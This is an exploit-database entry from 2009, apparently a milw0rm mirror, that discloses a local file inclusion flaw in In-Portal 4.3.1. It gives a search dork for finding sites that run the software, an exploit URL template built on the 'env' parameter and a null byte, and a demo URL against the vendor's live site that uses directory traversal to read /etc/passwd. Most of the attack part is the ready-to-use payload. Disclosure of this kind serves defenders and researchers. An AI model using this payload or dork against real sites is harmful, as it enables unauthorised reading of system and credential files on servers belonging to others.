In-portal 4.3.1 - 'index.php?env' Local File Inclusion



EKU-ID: 17134 CVE: OSVDB-56801;CVE-2009-4986 OSVDB-ID:
Author: Angela Chang Published: 2009-08-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


 @ ===================================================================================@
/                      Title    : Local File Inclusion Vulnerability                   \
                       Software : In-Portal 4.3.1
                       Vendor   : http://www.in-portal.net/
[-]                                                                                    [-]
                       Date     : 01 August 2009 (Indonesia)
                       Author   : Angela Chang
                       Contact  : mizz_4ng3l@yahoo.com
\                                                                                      /
 @ ===================================================================================@

 [-] Dork

     "Powered by In-portal"

 [-] Exploit

     http://[site]/[path]/index.php?env=-/[LFI]%00

 [-] Demo

     http://www.in-portal.net/demo/index.php?env=-/../../../../../../../../../../../../../../../etc/passwd%00

{o} ==================================================================================={o}

                                                 Greetz   :   -:-  SkyCreW  -:-

     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   str0ke


{o}===================================================================================={o}


{o}===================================================================================={o}

# milw0rm.com [2009-08-04]